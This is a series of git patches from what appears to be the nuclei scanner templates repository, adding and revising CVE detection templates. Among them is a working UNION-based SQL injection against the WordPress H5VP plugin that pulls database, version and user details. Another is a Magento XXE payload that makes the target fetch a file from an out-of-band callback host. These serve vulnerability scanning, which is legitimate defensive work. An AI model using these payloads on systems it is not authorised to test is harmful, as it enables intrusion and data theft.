+http/technologies/wordpress/plugins/woocommerce-payments.yaml:43f08a486a0284f2eaa2193b2c015d0443db7b75 +http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:f51de8be03264f0d385f7dbe9609a3907cc67943 +http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:6c03a96c8c315f6a946022bf064371141253c667 +http/technologies/wordpress/plugins/woocommerce-services.yaml:4c23784532bd1fcca9db44197f33f65bdb325b13 +http/technologies/wordpress/plugins/woocommerce.yaml:3d679700538235e1ab1fddd8a10832b87d99e5de +http/technologies/wordpress/plugins/wordfence.yaml:9313762d064153f5fd2b942f6af7dc4a5d328914 +http/technologies/wordpress/plugins/wordpress-importer.yaml:b88a74e59146b7d59a506d1238f6921b4f494f2b +http/technologies/wordpress/plugins/wordpress-seo.yaml:f6f0883e726d791e49658c74207bce56ff92bb49 http/technologies/wordpress/plugins/wordpress-woosidebars.yaml:679cd62c97446d90fc7fbb50f64403cb10c4c319 -http/technologies/wordpress/plugins/worker.yaml:eec5a16391040875785d932499c9f260e8efeb8c -http/technologies/wordpress/plugins/wp-fastest-cache.yaml:3bac8419d21ce83693d583293fb12b438a544402 -http/technologies/wordpress/plugins/wp-file-manager.yaml:227e50238a78872a0caf5ac0c54ab4d4fa33be67 -http/technologies/wordpress/plugins/wp-google-maps.yaml:f398fe5460d8180c0e85568b79baa92355130348 -http/technologies/wordpress/plugins/wp-mail-smtp.yaml:3c08f95f3bce5c44e7c5ebda373c397d0ddb8342 -http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:d7bb63c19f2338fd77cfa210fc4fa2e2c8bbff85 -http/technologies/wordpress/plugins/wp-migrate-db.yaml:996eb41fddbc34f6078ebecc34cececbb6eec504 -http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:252c64b3711943bbfd6d507669f1175f2225cbb2 -http/technologies/wordpress/plugins/wp-optimize.yaml:7d8bae34481b9723031a3574ce49620e76ad88ec -http/technologies/wordpress/plugins/wp-pagenavi.yaml:2a1f36db756a5f86740144301429285d3c50fee9 -http/technologies/wordpress/plugins/wp-reset.yaml:28019b1d96d3d4c456ac774c3e5cdeb666b06859 -http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:6100c61e48b0e15a0971d15714bdefa28c1fedcc -http/technologies/wordpress/plugins/wp-rollback.yaml:f7b2f501eb11a44d43b23d3933c06fe15927b2ca -http/technologies/wordpress/plugins/wp-seopress.yaml:1f1aa346cc5d9b8f6c766a4d6388dc8f90e34030 -http/technologies/wordpress/plugins/wp-sitemap-page.yaml:a4e9a4bb7976f9cab3829e15f7cf6a476a2e3792 -http/technologies/wordpress/plugins/wp-smushit.yaml:cff5012e05d9eca8dae054e4d73667340c631ddb -http/technologies/wordpress/plugins/wp-statistics.yaml:db2b26951dec4a78053fac69af816940d49cda0b -http/technologies/wordpress/plugins/wp-super-cache.yaml:312d5ce63e6b319b2688eb416664e575699fe649 +http/technologies/wordpress/plugins/worker.yaml:0fe262b5b760ef65a9d621235e1ee42ab1f212fa +http/technologies/wordpress/plugins/wp-fastest-cache.yaml:a5c35a9562749e5fe13679ef6a81d2424dadddd8 +http/technologies/wordpress/plugins/wp-file-manager.yaml:6068bf69fe4797338e246bfabb8d3886abeaa3db +http/technologies/wordpress/plugins/wp-google-maps.yaml:d1f4807f1738488caa2962f7d4c82ddbbbfe7098 +http/technologies/wordpress/plugins/wp-mail-smtp.yaml:f43ca4da9616e8963b5986439389569746b85e78 +http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:9eedc8bfc3a584e5b47b95b5423570a168f34997 +http/technologies/wordpress/plugins/wp-migrate-db.yaml:8769d90b6a61ff1127cd6a424fa5f64f2aebae19 +http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:f544677cf09564c9e3d2bfe921af13e25b4c57fe +http/technologies/wordpress/plugins/wp-optimize.yaml:a7e14e3639508ba4756aef6fa1fc9a1b6fbe1a99 +http/technologies/wordpress/plugins/wp-pagenavi.yaml:5a0831e3488346b3f7af19d4858ff9729353ddd9 +http/technologies/wordpress/plugins/wp-reset.yaml:998a493c3b21aed41ace4b1b4ff1ae7421dbe4a7 +http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:7dd4ebe8dbecfaa4f82c7fec006ae7ae6a3f7438 +http/technologies/wordpress/plugins/wp-rollback.yaml:631d11fad5e13a2e4a494e6b27005751256ae7da +http/technologies/wordpress/plugins/wp-seopress.yaml:4d32ae46b97e6e5b0ecd787687cceb3e97edb686 +http/technologies/wordpress/plugins/wp-sitemap-page.yaml:28ac0299492e1fd07a1bae1f753402366f45ccd4 +http/technologies/wordpress/plugins/wp-smushit.yaml:e94bf5e149cec24c820ac6e804f137f87e85d6b4 +http/technologies/wordpress/plugins/wp-statistics.yaml:b11396290ac16df9d0b4058c3040ba421df72972 +http/technologies/wordpress/plugins/wp-super-cache.yaml:42212a8062392bbd4cf3455332e93584a01c162c http/technologies/wordpress/plugins/wp-user-avatar.yaml:a8aa0e902ead01de33b23343603d18b63829517e -http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:a9acaa8bc79b55109355d8894c249b6e99fba870 -http/technologies/wordpress/plugins/wpcf7-redirect.yaml:da8bff7c82756e3e1ac6810a8eb2ef194d109a43 -http/technologies/wordpress/plugins/wpforms-lite.yaml:1fcff3d3b881c0f9dcf700cf7751c5297ee289ce -http/technologies/wordpress/plugins/wps-hide-login.yaml:faf97e5fb87bd43caaa123bb77e5cb64d218f00d -http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:f03291859093b6ab5196a683c017e300566beb9d +http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:bbdec57ee0328ab628227dca5fd4034fb6279a03 +http/technologies/wordpress/plugins/wpcf7-redirect.yaml:cb841859ebb348f9a2c8d41197d66098e2b81fa4 +http/technologies/wordpress/plugins/wpforms-lite.yaml:2095d1b65c74556a1fb50461be288ce07acd69a9 +http/technologies/wordpress/plugins/wps-hide-login.yaml:4fccef8bfa03a2b521fcbf987742a8e96796aef4 +http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:debc9ae1742ec04ea7b518634e80f932c0fc09a3 http/technologies/wordpress/plugins/yith-woocommerce-compare.yaml:caf39ccc6507df09c0816caa7af29404c193d9a5 -http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:c3474b242e88f3dd31b5317051e69194f36317f9 +http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:b4e27de7fbc0653ddbc77ea7ade813fb9b37b391 http/technologies/wordpress/themes/wp-bricks-builder-theme.yaml:0b85e26615c692bab9ceb5ae74dc9adec4097b9e http/technologies/wordpress-detect.yaml:a0148caf9d3f957171e7b75d4382dc7d54e454e5 http/technologies/workerman-websocket-detect.yaml:1396bc8234c4f538d5f57966b6b8084fe68f574f @@ -8790,7 +8791,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:2b7157e08f1912a9b7d31ff697a717216cfc379d +templates-checksum.txt:16d4a5c89a3ee4584cf40591c654776f6f8455f7 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From dab9f9bc1c420d249968839e6a577818e61ccaae Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Wed, 26 Jun 2024 10:31:32 +0000 Subject: [PATCH 0646/1841] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index b600aa7dd5..2e40abe13d 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -3,6 +3,7 @@ on: push: paths: - '.new-additions' + - 'http/cves/2023/CVE-2023-41599.yaml' - 'http/cves/2024/CVE-2024-34102.yaml' workflow_dispatch: jobs: From 0b6faf1b3c6480f25398f047bc3d37f8f702d94e Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Wed, 26 Jun 2024 10:32:31 +0000 Subject: [PATCH 0647/1841] Auto Template Signing [Wed Jun 26 10:32:31 UTC 2024] :robot: --- http/cves/2023/CVE-2023-41599.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/cves/2023/CVE-2023-41599.yaml b/http/cves/2023/CVE-2023-41599.yaml index 429ab5a56b..f5aa93a1b0 100644 --- a/http/cves/2023/CVE-2023-41599.yaml +++ b/http/cves/2023/CVE-2023-41599.yaml @@ -40,3 +40,4 @@ http: - type: status status: - 200 +# digest: 4b0a00483046022100826de30aa68fcef06d7f413cef902999ae9fe6710bc6936608d9a8a83de0a24e022100b67c95179ff4a58310712f3998f2e605aa905e43e532d02454eddde10eb9792f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From a20079f20371e7b67a1b0a9eee0ef1b7dfac2306 Mon Sep 17 00:00:00 2001 From: root <JohnDoe5522@proton.me> Date: Wed, 26 Jun 2024 14:25:27 +0200 Subject: [PATCH 0648/1841] Added CVE-2024-5522 Template --- http/cves/2024/CVE-2024-5522.yaml | 46 +++++++++++++++++++++++++++++++ 1 file changed, 46 insertions(+) create mode 100644 http/cves/2024/CVE-2024-5522.yaml diff --git a/http/cves/2024/CVE-2024-5522.yaml b/http/cves/2024/CVE-2024-5522.yaml new file mode 100644 index 0000000000..0ffb9523a9 --- /dev/null +++ b/http/cves/2024/CVE-2024-5522.yaml @@ -0,0 +1,46 @@ +id: CVE-2024-5522 + +info: + name: WordPress H5VP Plugin <= 2.5.26 - SQL Injection + author: JohnDoeAnonITA + severity: high + description: | + The HTML5 Video Player WordPress plugin before 2.5.27 does not sanitize and escape a parameter from a REST route before using it in a SQL statement, allowing unauthenticated users to perform SQL injection attacks + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2024-5522 + - https://wpscan.com/vulnerability/bc76ef95-a2a9-4185-8ed9-1059097a506a/ + classification: + cvss-score: 10 + cve-id: CVE-2024-5522 + epss-score: 0.04 + epss-percentile: 9 + metadata: + verified: false + max-request: 1 + tags: wpscan,cve,cve2024,wordpress,wp-plugin,wp,sqli,h5vp + + +http: + - method: GET + path: + - "{{BaseURL}}/wp-json/h5vp/v1/video/0?id='+union all select concat(0x64617461626173653a,database(),0x7c76657273696f6e3a,version(),0x7c757365723a,user()),2,3,4,5,6,7,8-- -" + redirects: true + max-redirects: 3 + headers: + Cookie: "instawp_skip_splash=true; path=/" + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: regex + regex: + - "database:.*\\|version:.*\\|user:.*" + part: body + + extractors: + - type: regex + part: body + group: 1 + regex: + - ":\"*([^,]+),\"tit" \ No newline at end of file From dfdfa9f9cdd51dd6e3bb5a1be6854342e39b7240 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Wed, 26 Jun 2024 18:24:12 +0530 Subject: [PATCH 0649/1841] Create CVE-2024-37152.yaml --- http/cves/2024/CVE-2024-37152.yaml | 40 ++++++++++++++++++++++++++++++ 1 file changed, 40 insertions(+) create mode 100644 http/cves/2024/CVE-2024-37152.yaml diff --git a/http/cves/2024/CVE-2024-37152.yaml b/http/cves/2024/CVE-2024-37152.yaml new file mode 100644 index 0000000000..620958d238 --- /dev/null +++ b/http/cves/2024/CVE-2024-37152.yaml @@ -0,0 +1,40 @@ +id: CVE-2024-37152 + +info: + name: Argo CD Unauthenticated Access to sensitive setting + author: DhiyaneshDk + severity: medium + description: | + Argo CD is a declarative, GitOps continuous delivery tool for Kubernetes. The vulnerability allows unauthorized access to the sensitive settings exposed by /api/v1/settings endpoint without authentication. All sensitive settings are hidden except passwordPattern. + reference: + - https://github.com/argoproj/argo-cd/security/advisories/GHSA-87p9-x75h-p4j2 + - https://nvd.nist.gov/vuln/detail/CVE-2024-37152 + metadata: + verified: true + max-request: 1 + shodan-query: html:"Argo CD" + tags: cve,cve2024,argo-cd,info-leak + +http: + - raw: + - | + GET /api/v1/settings HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '"passwordPattern":' + - '"appLabelKey":' + condition: and + + - type: word + part: content_type + words: + - 'application/json' + + - type: status + status: + - 200 From 4573fcab62621b2772ae5ade0e35396c19f1526f Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Wed, 26 Jun 2024 18:27:14 +0530 Subject: [PATCH 0650/1841] minor fix --- http/cves/2024/CVE-2024-37152.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/http/cves/2024/CVE-2024-37152.yaml b/http/cves/2024/CVE-2024-37152.yaml index 620958d238..6d349ec802 100644 --- a/http/cves/2024/CVE-2024-37152.yaml +++ b/http/cves/2024/CVE-2024-37152.yaml @@ -7,8 +7,8 @@ info: description: | Argo CD is a declarative, GitOps continuous delivery tool for Kubernetes. The vulnerability allows unauthorized access to the sensitive settings exposed by /api/v1/settings endpoint without authentication. All sensitive settings are hidden except passwordPattern. reference: - - https://github.com/argoproj/argo-cd/security/advisories/GHSA-87p9-x75h-p4j2 - - https://nvd.nist.gov/vuln/detail/CVE-2024-37152 + - https://github.com/argoproj/argo-cd/security/advisories/GHSA-87p9-x75h-p4j2 + - https://nvd.nist.gov/vuln/detail/CVE-2024-37152 metadata: verified: true max-request: 1 From 64e1b2b2348e64dd36850c13c46ada421afbb471 Mon Sep 17 00:00:00 2001 From: Kazgangap <halilkirazkaya@yandex.com> Date: Wed, 26 Jun 2024 16:14:14 +0300 Subject: [PATCH 0651/1841] add CVE-2024-37881 --- http/cves/2024/CVE-2024-37881.yaml | 47 ++++++++++++++++++++++++++++++ 1 file changed, 47 insertions(+) create mode 100644 http/cves/2024/CVE-2024-37881.yaml diff --git a/http/cves/2024/CVE-2024-37881.yaml b/http/cves/2024/CVE-2024-37881.yaml new file mode 100644 index 0000000000..55ac7c9316 --- /dev/null +++ b/http/cves/2024/CVE-2024-37881.yaml @@ -0,0 +1,47 @@ +id: CVE-2024-37881 + +info: + name: SiteGuard WP Plugin <= 1.7.6 - Login Page Disclosure + author: securityforeveryone + severity: medium + description: | + The SiteGuard WP Plugin plugin for WordPress is vulnerable to protection mechanism bypass in all versions up to, and including, 1.7.6. This is due to the plugin not restricting redirects from wp-register.php which may disclose the login page URL. This makes it possible for unauthenticated attackers to gain access to the login page. + reference: + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-37881 + - https://jvn.jp/en/jp/JVN60331535/ + - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/siteguard/siteguard-wp-plugin-176-login-page-disclosure + - https://www.usom.gov.tr/bildirim/tr-24-0726 + metadata: + verified: true + max-request: 1 + publicwww-query: "/wp-content/plugins/siteguard/" + tags: cve,cve-2024,siteguard,wp-plugin + +flow: http(1) && http(2) + +http: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/siteguard/readme.txt" + + matchers: + - type: dsl + internal: true + dsl: + - 'status_code == 200' + - 'contains(body, "SiteGuard WP Plugin")' + condition: and + + - method: GET + path: + - "{{BaseURL}}/wp-register.php" + + matchers: + - type: dsl + dsl: + - "!contains(tolower(location), 'wp-login.php')" + + extractors: + - type: kval + kval: + - location From 58247953621d1ac00a2a7d865f4f96911a093da5 Mon Sep 17 00:00:00 2001 From: Prince Chaddha <prince@projectdiscovery.io> Date: Wed, 26 Jun 2024 18:43:36 +0400 Subject: [PATCH 0652/1841] Update .nuclei-ignore --- .nuclei-ignore | 1 + 1 file changed, 1 insertion(+) diff --git a/.nuclei-ignore b/.nuclei-ignore index 06d5a778e8..40836fa6c0 100644 --- a/.nuclei-ignore +++ b/.nuclei-ignore @@ -38,3 +38,4 @@ files: - dns/txt-service-detect.yaml - javascript/enumeration/pop3/pop3-capabilities-enum.yaml - javascript/enumeration/redis/redis-require-auth.yaml + - dast/vulnerabilities/sqli/time-based-sqli.yaml From d03644bfcb2600211579df05383bc2cfc7a16027 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Wed, 26 Jun 2024 21:02:04 +0530 Subject: [PATCH 0653/1841] Update CVE-2024-34102.yaml --- http/cves/2024/CVE-2024-34102.yaml | 28 +++++++++++++--------------- 1 file changed, 13 insertions(+), 15 deletions(-) diff --git a/http/cves/2024/CVE-2024-34102.yaml b/http/cves/2024/CVE-2024-34102.yaml index da821b1923..5ecfa9926f 100644 --- a/http/cves/2024/CVE-2024-34102.yaml +++ b/http/cves/2024/CVE-2024-34102.yaml @@ -24,20 +24,18 @@ http: {"address":{"totalsCollector":{"collectorList":{"totalCollector":{"sourceData":{"data":"http://{{interactsh-url}}/xxe.xml","dataIsURL":true,"options":12345678}}}}}} - matchers-condition: and + matchers-condition: or matchers: - - type: word - part: interactsh_protocol # Confirms the DNS Interaction - words: - - 'dns' + - type: dsl + dsl: + - 'contains(interactsh_protocol, "dns")' + - 'contains(content_type, "application/json")' + - 'contains(body, "message") && contains(body, "log file")' + condition: and - - type: word - part: body - words: - - '"message":' - - - type: word - part: header - words: - - "application/json" -# digest: 490a00463044022070921dac10cae36b2c23b2e02a100a75afb65d7f5274a4e5a5ec9c83980abcea02207396590bc55c847a284d02fda51a9d36fea759c5d1d950453a8a0bd177ed7042:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + - type: dsl + dsl: + - 'contains(interactsh_protocol, "dns")' + - 'contains(content_type, "application/json")' + - 'contains(body, "message") && contains(body, "cartId")' + condition: and From 58de5fe1b24b4474c5dd468a0087eea49c5c8e43 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Wed, 26 Jun 2024 16:06:31 +0000 Subject: [PATCH 0654/1841] Auto Generated Templates Checksum [Wed Jun 26 16:06:31 UTC 2024] :robot: --- templates-checksum.txt | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index ad36acff0e..03db1683f7 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3253,7 +3253,7 @@ http/cves/2023/CVE-2023-41265.yaml:690ef3967f4a383b6de2fe9a099db2e10df9b132 http/cves/2023/CVE-2023-41266.yaml:f7a50a86eec6072d1c39c51f8ae0237d9de19b1e http/cves/2023/CVE-2023-4148.yaml:dd568e6c72619e2d55cc4ef764fc5944636c7946 http/cves/2023/CVE-2023-41538.yaml:4e735c71f54ac27baa8987be74e444bbe0f9775c -http/cves/2023/CVE-2023-41599.yaml:073234f82adb547fc355604bb6e1fac72a492a7b +http/cves/2023/CVE-2023-41599.yaml:5fa729a8f6e9c03a4ee8e4ed960d4236b8be4f71 http/cves/2023/CVE-2023-41642.yaml:fbee72e0d62b6fa6c43e1bb34c5800412ac27d0e http/cves/2023/CVE-2023-4168.yaml:0006757cc3858b565e930fb9235b2269e59b1d64 http/cves/2023/CVE-2023-4169.yaml:639f6a6b20b2c228fb24159376e31c38682b5364 @@ -3443,7 +3443,7 @@ http/cves/2024/CVE-2024-33288.yaml:021f1910a0468103d59167ac39fc9cf77f246bab http/cves/2024/CVE-2024-33575.yaml:bc3e1dc9d582e0bb3430a33791936484425fb962 http/cves/2024/CVE-2024-33724.yaml:fc5b67f9b84cdf5d6d592f2238c1fb0ef08592cc http/cves/2024/CVE-2024-3400.yaml:446beaf529f998b8b0c5957b75870f5198c21ff2 -http/cves/2024/CVE-2024-34102.yaml:1b7f00e3a39881ea8303c1e3b844907d7b4dcb66 +http/cves/2024/CVE-2024-34102.yaml:e60a9caeef15ae32d4123681136a3c94b938753c http/cves/2024/CVE-2024-34470.yaml:9e15fe4d83b7f511f9e363252311ce0fca2208d8 http/cves/2024/CVE-2024-3495.yaml:1f4e6d704c91902aa02887883d46718b45f87654 http/cves/2024/CVE-2024-34982.yaml:68453463b4c080e16f4b23e4bcf22565276f0e20 @@ -8791,7 +8791,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:16d4a5c89a3ee4584cf40591c654776f6f8455f7 +templates-checksum.txt:e88f55bf04da857cf09ef5283eb77403bc91a523 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From d503a111abf91907006a46fee912a753210e19bb Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Wed, 26 Jun 2024 16:08:24 +0000 Subject: [PATCH 0655/1841] Auto Template Signing [Wed Jun 26 16:08:24 UTC 2024] :robot: --- http/cves/2024/CVE-2024-34102.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/cves/2024/CVE-2024-34102.yaml b/http/cves/2024/CVE-2024-34102.yaml index 5ecfa9926f..0acc07226e 100644 --- a/http/cves/2024/CVE-2024-34102.yaml +++ b/http/cves/2024/CVE-2024-34102.yaml @@ -39,3 +39,4 @@ http: - 'contains(content_type, "application/json")' - 'contains(body, "message") && contains(body, "cartId")' condition: and +# digest: 490a0046304402203893e705a9d4cf9e7d7e2496277394f23d202b239760870ea9cadae68ebd9b07022003ab468c5e1c261ffb105d2d9b90ce330b27a1f0546ac68ad46b5b8e29c866ce:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 7d6d3f301b0fb365d5a52500f9cb9f0db6aa4966 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 27 Jun 2024 00:27:37 +0530 Subject: [PATCH 0656/1841] Update CVE-2024-34102.yaml --- http/cves/2024/CVE-2024-34102.yaml | 20 +++++++++----------- 1 file changed, 9 insertions(+), 11 deletions(-) diff --git a/http/cves/2024/CVE-2024-34102.yaml b/http/cves/2024/CVE-2024-34102.yaml index 0acc07226e..d2747dc572 100644 --- a/http/cves/2024/CVE-2024-34102.yaml +++ b/http/cves/2024/CVE-2024-34102.yaml @@ -9,10 +9,15 @@ info: reference: - https://github.com/spacewasp/public_docs/blob/main/CVE-2024-34102.md - https://www.assetnote.io/resources/research/why-nested-deserialization-is-harmful-magento-xxe-cve-2024-34102 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2024-34102 + cwe-id: CWE-611 metadata: - fofa-query: app="Adobe-Magento" verified: true max-request: 1 + fofa-query: app="Adobe-Magento" tags: cve,cve2024,adobe,magento,xxe http: @@ -24,19 +29,12 @@ http: {"address":{"totalsCollector":{"collectorList":{"totalCollector":{"sourceData":{"data":"http://{{interactsh-url}}/xxe.xml","dataIsURL":true,"options":12345678}}}}}} - matchers-condition: or matchers: - type: dsl dsl: - 'contains(interactsh_protocol, "dns")' - 'contains(content_type, "application/json")' - - 'contains(body, "message") && contains(body, "log file")' + - 'contains_any(body, "log file", "cartId", "no Route")' + - 'contains(body, "message")' condition: and - - - type: dsl - dsl: - - 'contains(interactsh_protocol, "dns")' - - 'contains(content_type, "application/json")' - - 'contains(body, "message") && contains(body, "cartId")' - condition: and -# digest: 490a0046304402203893e705a9d4cf9e7d7e2496277394f23d202b239760870ea9cadae68ebd9b07022003ab468c5e1c261ffb105d2d9b90ce330b27a1f0546ac68ad46b5b8e29c866ce:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402203893e705a9d4cf9e7d7e2496277394f23d202b239760870ea9cadae68ebd9b07022003ab468c5e1c261ffb105d2d9b90ce330b27a1f0546ac68ad46b5b8e29c866ce:922c64590222798bb761d5b6d8e72950 From 9427c5b8a3798f2fe116f529afab379b83d1feda Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Thu, 27 Jun 2024 00:19:18 +0000 Subject: [PATCH 0657/1841] Auto WordPress Plugins Update [Thu Jun 27 00:19:18 UTC 2024] :robot: --- .../wordpress/plugins/all-in-one-wp-security-and-firewall.txt | 2 +- helpers/wordpress/plugins/click-to-chat-for-whatsapp.txt | 2 +- helpers/wordpress/plugins/elementor.txt | 2 +- helpers/wordpress/plugins/google-listings-and-ads.txt | 2 +- helpers/wordpress/plugins/image-optimization.txt | 2 +- helpers/wordpress/plugins/jetpack-boost.txt | 2 +- helpers/wordpress/plugins/kadence-blocks.txt | 2 +- helpers/wordpress/plugins/pixelyoursite.txt | 2 +- helpers/wordpress/plugins/royal-elementor-addons.txt | 2 +- helpers/wordpress/plugins/seo-by-rank-math.txt | 2 +- helpers/wordpress/plugins/translatepress-multilingual.txt | 2 +- helpers/wordpress/plugins/wp-statistics.txt | 2 +- http/technologies/wordpress/plugins/ad-inserter.yaml | 1 - http/technologies/wordpress/plugins/add-to-any.yaml | 1 - http/technologies/wordpress/plugins/admin-menu-editor.yaml | 1 - http/technologies/wordpress/plugins/advanced-custom-fields.yaml | 1 - http/technologies/wordpress/plugins/akismet.yaml | 1 - http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml | 1 - .../technologies/wordpress/plugins/all-in-one-wp-migration.yaml | 1 - .../wordpress/plugins/all-in-one-wp-security-and-firewall.yaml | 1 - http/technologies/wordpress/plugins/amp.yaml | 1 - http/technologies/wordpress/plugins/antispam-bee.yaml | 1 - http/technologies/wordpress/plugins/astra-sites.yaml | 1 - http/technologies/wordpress/plugins/autoptimize.yaml | 1 - http/technologies/wordpress/plugins/backwpup.yaml | 1 - http/technologies/wordpress/plugins/better-search-replace.yaml | 1 - http/technologies/wordpress/plugins/better-wp-security.yaml | 1 - .../wordpress/plugins/black-studio-tinymce-widget.yaml | 1 - http/technologies/wordpress/plugins/breadcrumb-navxt.yaml | 1 - http/technologies/wordpress/plugins/breeze.yaml | 1 - http/technologies/wordpress/plugins/broken-link-checker.yaml | 1 - .../wordpress/plugins/child-theme-configurator.yaml | 1 - http/technologies/wordpress/plugins/classic-editor.yaml | 1 - http/technologies/wordpress/plugins/classic-widgets.yaml | 1 - .../wordpress/plugins/click-to-chat-for-whatsapp.yaml | 1 - http/technologies/wordpress/plugins/cmb2.yaml | 1 - http/technologies/wordpress/plugins/coblocks.yaml | 1 - http/technologies/wordpress/plugins/code-snippets.yaml | 1 - http/technologies/wordpress/plugins/coming-soon.yaml | 1 - http/technologies/wordpress/plugins/complianz-gdpr.yaml | 1 - .../technologies/wordpress/plugins/contact-form-7-honeypot.yaml | 1 - http/technologies/wordpress/plugins/contact-form-7.yaml | 1 - http/technologies/wordpress/plugins/contact-form-cfdb7.yaml | 1 - http/technologies/wordpress/plugins/cookie-law-info.yaml | 1 - http/technologies/wordpress/plugins/cookie-notice.yaml | 1 - http/technologies/wordpress/plugins/copy-delete-posts.yaml | 1 - http/technologies/wordpress/plugins/creame-whatsapp-me.yaml | 1 - .../wordpress/plugins/creative-mail-by-constant-contact.yaml | 1 - http/technologies/wordpress/plugins/custom-css-js.yaml | 1 - http/technologies/wordpress/plugins/custom-fonts.yaml | 1 - http/technologies/wordpress/plugins/custom-post-type-ui.yaml | 1 - http/technologies/wordpress/plugins/disable-comments.yaml | 1 - http/technologies/wordpress/plugins/disable-gutenberg.yaml | 1 - http/technologies/wordpress/plugins/duplicate-page.yaml | 1 - http/technologies/wordpress/plugins/duplicate-post.yaml | 1 - http/technologies/wordpress/plugins/duplicator.yaml | 1 - .../wordpress/plugins/duracelltomi-google-tag-manager.yaml | 1 - http/technologies/wordpress/plugins/easy-table-of-contents.yaml | 1 - http/technologies/wordpress/plugins/easy-wp-smtp.yaml | 1 - http/technologies/wordpress/plugins/elementor.yaml | 1 - http/technologies/wordpress/plugins/elementskit-lite.yaml | 1 - http/technologies/wordpress/plugins/enable-media-replace.yaml | 1 - http/technologies/wordpress/plugins/envato-elements.yaml | 1 - .../wordpress/plugins/essential-addons-for-elementor-lite.yaml | 1 - http/technologies/wordpress/plugins/ewww-image-optimizer.yaml | 1 - .../wordpress/plugins/facebook-for-woocommerce.yaml | 1 - http/technologies/wordpress/plugins/fast-indexing-api.yaml | 1 - .../wordpress/plugins/favicon-by-realfavicongenerator.yaml | 1 - http/technologies/wordpress/plugins/flamingo.yaml | 1 - http/technologies/wordpress/plugins/fluentform.yaml | 1 - http/technologies/wordpress/plugins/font-awesome.yaml | 1 - .../wordpress/plugins/force-regenerate-thumbnails.yaml | 1 - http/technologies/wordpress/plugins/formidable.yaml | 1 - http/technologies/wordpress/plugins/forminator.yaml | 1 - http/technologies/wordpress/plugins/ga-google-analytics.yaml | 1 - http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml | 1 - .../wordpress/plugins/google-analytics-dashboard-for-wp.yaml | 1 - .../wordpress/plugins/google-analytics-for-wordpress.yaml | 1 - .../technologies/wordpress/plugins/google-listings-and-ads.yaml | 1 - http/technologies/wordpress/plugins/google-site-kit.yaml | 1 - .../wordpress/plugins/google-sitemap-generator.yaml | 1 - http/technologies/wordpress/plugins/gtranslate.yaml | 1 - http/technologies/wordpress/plugins/gutenberg.yaml | 1 - 